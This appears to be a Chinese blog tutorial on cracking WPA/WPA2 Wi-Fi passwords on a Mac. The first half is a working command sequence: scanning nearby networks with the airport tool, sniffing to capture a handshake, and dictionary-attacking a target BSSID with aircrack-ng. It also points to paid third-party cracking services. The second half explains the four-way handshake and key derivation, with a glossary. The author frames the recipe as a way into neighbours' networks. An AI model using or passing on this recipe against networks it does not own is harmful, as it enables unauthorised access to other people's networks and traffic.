安装 macport 是一个工具 管理软件包的一个工具, 我们也可以通过别的方式安装 Aircrack-ng, 但是通过 macport 安装 Aircrack-ng 的速度是最快的, (Mac 系统要求安装 Xcode, 可以参考 macport 的首页)
通过 shell 命令行执行:
- sudo port install aircrack-ng
通过 ifconfig 命令获取当前的网卡的名字, 我这边网卡名字为 en0:
使用 mac 系统自带的 airport 工具, 查看当前的无线网络, 以及它们的相关信息,在 shell 中执行:
- sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s
系统回显如下图, 以下为我附近所有的 wifi, 注意看表格, SSID, BSSID, CHANNEL,这些关键词都会在后面提到:
参数 en0 是我电脑的默认网卡, 数字 6 是网卡需要监听的网络频道:
- sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport en0 sniff 6
当执行以上命令, 开始监听以后, wifi 的图标会发生改变, 变成一个小眼睛一样的图标:
监听久一点, 然后使用 ctrl+c 停止监听, 系统会把监听到的数据保存到本地, 如下图, 数据保存到 / tmp/airportSniffdaMCjH.cap 文件中:
在监听的过程中如果有用户登陆这个 wifi, 那么包就会被我们截获, 如果用户一直没有登陆到这个 wifi, 我们就还要继续等待监听, 尽量在手机或者手提电脑所用高峰期开启捕获, 这样捕获握手(handshake)的几率比较高, 具体原理参考最后的链接;
输入命令:
- sudo aircrack-ng /tmp/airportSniff8g0Oex.cap
如果要查询的路由列表的 Encryption 值为 WPA(1 handshake) ,说明抓取成功, 否者跳到第六步,要重新抓取:
-b 后面的参数 bc:46:99:df:6c:72 指的是网卡的 BSSID, 最后面的一个文件路径是上一步监听到的数据
- sudo aircrack-ng -w dict.txt -b bc:46:99:df:6c:72 /tmp/airportSniffdaMCjH.cap
只要字典够大, 密码破出来应该指日可待, 字典可以自己去做,或者网上下载
能不能破解主要看脸, 看运气
破解成功以后,命令行会显示 KEY FOUND :
如果觉的自己弄个字典爆破很麻烦, 有些第三方的网站提供免费爆破,或者收费的爆破,
由于 WEP 中存在严重的安全漏洞,WIFI 联盟制定了 WPA 和 WPA2 以取代 WEP。其中 WPA 实现了 802.11i 的主要部分,提供了对现有硬件的向下兼容,被用来作为 WEP 到 802.11i 的过渡。之后的则 WPA2 完整的实现了整个 IEEE 802.1i 标准。
WPA 的根据应用场景的不同采用不同的认证方式,其中面对家庭或小型办公场所网络的 WPA-PSK 不需要专门的认证服务器,所有该网络中的设备通过使用同一个 256-bit 的密钥来进行认证。
WPA-PSK 认证中的四次握手被设计用来在不安全的信道中,通过明文传输的方式来进行一定程度上的认证,并且在设备之间建立安全信道。首先,PSK 会被转化为 PMK,而 PMK 则在接下来被用于生成 PTK。PTK 则会被分为若干部分,其中一部分被称作 MIC Key,用来生成每一个包的 Hash 值来用于验证。
WPA 的安全问题与其认证过程所使用的算法关系不大,更多的是由于这一过程可以被轻易的重现,这就使得 WPA-PSK 可能遭受字典暴力攻击。
WPA-PSK 攻击分为以下几个步骤:
1. 根据 passphrase,SSID 生成 PMK,即 PMK = pdkdf2_SHA1(passphrase, SSID, SSID length, 4096)
2. 捕获 EAPOL 四次握手的数据包,得到 ANonce,SNonce 等信息,用于计算 PTK,即
PTK = PRF-X(PMK, Len(PMK), "Pairwise key expansion", Min(AA,SA) || Max(AA,SA) || Min(ANonce, SNonce) || Max(ANonce, SNonce))
3. 使用 MIC Key 计算 EAPOL 报文的 MIC,即 MIC = HMAC_MD5(MIC Key, 16, 802.1x data)
4. 将计算得到的 MIC 值与捕获到的 MIC 值对比,如果相同则破解成功。
WPA-PSK 攻击的主要难点在于大量计算 PMK 所需要的计算量。一台普通的计算机通常的计算能力在 500pmks/s,想要对 8 位的纯小写字母组合密码进行暴力破解所需要的时间为 14 年,所以想要破解 WPA-PSK 只有两种可能:1. 用户使用了常见的弱密码;2. 堆砌计算资源,获得超级计算机量级的计算能力。
AP(Access Point): 网络接入点,是一种连接无线或有线网络的设备。就是俗称的路由器。
MAC(Media Access Control Address): 相当于网卡的身份证,MAC 地址本身是不能修改,但是可以通过伪造 MAC 地址欺骗 AP。
WEP(Wireless Encryption Protocol): 无线加密协议。很早的一种加密协议,容易破解。
WPA/WPA2(Wi-FiProtected Access): 基于 WEP 更安全的加密系统。
Handshake: 握手。
IV(Initialization Vector)s: 初始化向量。
macport:
使用 macbook 破解 WPA/WPA2 wifi 密码:
WEP&WPA Cracking on BT5/MAC 原理:
第三方的爆破网站: (提供免费的破解, 也提供收费的破解方式, 使用比特币作为支付媒介)
作者: {aa11aa}
来源: